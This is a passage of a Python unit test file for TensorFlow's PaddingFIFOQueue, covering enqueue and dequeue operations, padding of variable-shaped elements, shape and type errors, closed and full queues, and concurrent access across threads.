def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, size.eval())
dequeued_t.op.run()
self.assertEqual(0, size.eval())
def testEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = dequeued_t.eval()
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None, None),))
empty_t = tf.constant([], dtype=tf.float32,
shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], size_t.eval())
enqueue_op.run()
self.assertEqual([0], size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpToWithDynamicShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testConstructPaddingFIFOQueueWithNoShape(self):
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
tf.PaddingFIFOQueue(10, tf.float32, None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), ((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], dequeued_t.eval())
self.assertAllEqual(elems[4:8], dequeued_t.eval())
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], dequeued_t.eval())
self.assertAllEqual(elems[4:8], dequeued_t.eval())
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32),
shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.string, tf.int32),
shapes=((None,), (1, None)))
str_elems = [
["a"],
["ab"],
["abc"],
["abc", "d"],
["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [
[[1]],
[[2]],
[[3]],
[[1, 2]],
[[1, 2, 3]],
[[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(
[[b"a", b"", b""], [b"ab", b"", b""], [b"abc", b"", b""],
[b"abc", b"d", b""], [b"abc", b"d", b"e"]], string_val)
self.assertAllEqual(
[[[1, 0, 0]],
[[2, 0, 0]],
[[3, 0, 0]],
[[1, 2, 0]],
[[1, 2, 3]]],
int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueUpToPartiallyKnownShapesAndVariableInputNoBlocking(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.string, tf.int32),
shapes=((None,), (1, None)))
str_elems = [
["a"],
["ab"],
["abc"],
["abc", "d"],
["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [
[[1]],
[[2]],
[[3]],
[[1, 2]],
[[1, 2, 3]],
[[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_up_to(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(
[[b"a", b"", b""], [b"ab", b"", b""], [b"abc", b"", b""],
[b"abc", b"d", b""], [b"abc", b"d", b"e"]], string_val)
self.assertAllEqual(
[[[1, 0, 0]],
[[2, 0, 0]],
[[3, 0, 0]],
[[1, 2, 0]],
[[1, 2, 3]]],
int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32, tf.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(tf.int32, enq.inputs[1].dtype)
self.assertEqual(tf.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
with self.assertRaises(ValueError):
q.enqueue((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError, r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
dequeued_t.eval()
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(50, tf.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
sess.run(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(sess.run(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_placeholder = tf.placeholder(tf.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = tf.placeholder(
tf.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(elements_enqueued,
elements_enqueued + count,
dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = tf.placeholder(tf.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
sess.run(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, dequeued_t.eval())
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(elements_dequeued,
elements_dequeued + count,
dtype=np.int32)
self.assertAllEqual(
expected_range, dequeuemany_t.eval({count_placeholder: count}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = tf.PaddingFIFOQueue(100, tf.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = tf.PaddingFIFOQueue(total_count, tf.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], sess.run(dequeued_t))
self.assertAllEqual(elems[3:], sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
sess.run(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], sess.run(dequeued_t))
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(dequeued_t)
self.assertEqual(elems[3], sess.run(cleanup_dequeue_t))
def close():
sess.run(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, (tf.float32, tf.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = sess.run([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
self.assertEqual([50.0], dequeued_t.eval())
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
time.sleep(0.01)
self.assertEqual([50.0], dequeued_t.eval())
self.assertEqual([60.0], dequeued_t.eval())
def testBlockingEnqueueBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
sess.run(blocking_enqueue_op)
